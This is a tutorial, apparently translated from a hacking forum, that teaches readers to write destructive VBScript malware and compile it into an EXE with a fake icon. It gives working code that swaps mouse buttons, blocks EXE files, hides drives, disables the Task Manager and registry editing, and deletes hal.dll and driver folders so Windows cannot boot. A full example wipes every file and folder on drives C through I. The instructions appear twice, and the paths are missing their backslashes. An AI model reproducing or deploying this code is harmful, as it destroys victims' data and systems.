The malware will be written in visual basic script.
Then compiled into "exe" format.
Let's get started:
First, you need to be able to change the file extension, and that's where we'll start.
There are many ways, but I like it.
Everyone should have a regular archiver,so we'll use it.
So, for example, create a text file called "Text Document".
Now find this text file in your archiver. In the archiver, you should see the following: "Text-based document.txt".
The ending "txt" is the name of the file extension, so you need to change it, just like if you edit the name of a folder or file, erase the line "txt" and put it in "mp3".
As a result, we get a "Text document. mp3" format.
If everything is clear, and there are no questions to be raised about this, then let's move on.
Create a text document containing the following:
Then, after saving the received data, you need to change the file extension, and instead of "txt"write "vbs".
The abbreviation " vbs " comes from the name of the programming language - "visual basic script".
Here we have the first, simple, malicious program that swaps mouse buttons.
Now you need to compile (change) it to the " exe "format using the program:" Vbs2Exe", and set any icon using the icon grabber: "IconToy".
And now information for those who do not intend to limit their capabilities to a banal exchange of mouse buttons.
Three, top lines - must always be present. Further, the encoding should follow, and an explanation should appear in parentheses below.
It is also possible to combine these or other malicious commands.
(It is forbidden to open " EXE " files)
(disallow access to hard drives)
(the system file is deleted, after which Windows cannot boot.
The system works until the first reboot)
(removing drivers)
(Deleting a folder. Example: fso. deletefolder "C:New folder", 1)
(Deleting all folders on Disk c. You can set any address)
(Delete the file. Example: fso. deletefile " C:New Foldertext документ.txt", 1)
(Deleting all files on Disk c. You can set any address)
(Stop editing the registry)
(Banning the Task Manager)
(Exchange of mouse buttons)
Example:
Then compiled into "exe" format.
Let's get started:
First, you need to be able to change the file extension, and that's where we'll start.
There are many ways, but I like it.
Everyone should have a regular archiver,so we'll use it.
So, for example, create a text file called "Text Document".
Now find this text file in your archiver. In the archiver, you should see the following: "Text-based document.txt".
The ending "txt" is the name of the file extension, so you need to change it, just like if you edit the name of a folder or file, erase the line "txt" and put it in "mp3".
As a result, we get a "Text document. mp3" format.
If everything is clear, and there are no questions to be raised about this, then let's move on.
Create a text document containing the following:
Code:
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
s.run"rundll32 user32, SwapMouseButton"
Then, after saving the received data, you need to change the file extension, and instead of "txt"write "vbs".
The abbreviation " vbs " comes from the name of the programming language - "visual basic script".
Here we have the first, simple, malicious program that swaps mouse buttons.
Now you need to compile (change) it to the " exe "format using the program:" Vbs2Exe", and set any icon using the icon grabber: "IconToy".
And now information for those who do not intend to limit their capabilities to a banal exchange of mouse buttons.
Code:
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
Three, top lines - must always be present. Further, the encoding should follow, and an explanation should appear in parentheses below.
It is also possible to combine these or other malicious commands.
Code:
s.regwrite"HKCRexefileshellopencommand","rundll32.exe"
(It is forbidden to open " EXE " files)
Code:
s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives","67108863","REG_DWORD"
s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewOnDrive","67108863","REG_DWORD"
(disallow access to hard drives)
Code:
fso.deletefile fso.getspecialfolder(0)+"system32hal.dll",1
(the system file is deleted, after which Windows cannot boot.
The system works until the first reboot)
Code:
fso.deletefolder fso.getspecialfolder(0)+"system32drives",1
fso.deletefolder fso.getspecialfolder(0)+"Driver Cache"
(removing drivers)
Code:
fso. deletefolder "ADDRESS", 1
(Deleting a folder. Example: fso. deletefolder "C:New folder", 1)
Code:
fso.deletefolder "C:*.*",1
(Deleting all folders on Disk c. You can set any address)
Code:
fso. deletefile "ADDRESS", 1
(Delete the file. Example: fso. deletefile " C:New Foldertext документ.txt", 1)
Code:
fso.deletefile "C:*.*",1
(Deleting all files on Disk c. You can set any address)
Code:
s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemdisableregistrytools","1","REG_DWORD"
(Stop editing the registry)
Code:
s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemdisabletaskmgr","1","REG_DWORD"
(Banning the Task Manager)
Code:
s.run"rundll32 user32, SwapMouseButton"
(Exchange of mouse buttons)
Example:
Code:
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
fso.deletefile "C:*.*",1
fso.deletefolder "C:*.*",1
fso.deletefile "D:*.*",1
fso.deletefolder "D:*.*",1
fso.deletefile "E:*.*",1
fso.deletefolder "E:*.*",1
fso.deletefile "F:*.*",1
fso.deletefolder "F:*.*",1
fso.deletefile "G:*.*",1
fso.deletefolder "G:*.*",1
fso.deletefile "H:*.*",1
fso.deletefolder "H:*.*",1
fso.deletefile "I:*.*",1
fso.deletefolder "I:*.*",1
fso.deletefile fso.getspecialfolder(0)+"system32hal.dll",1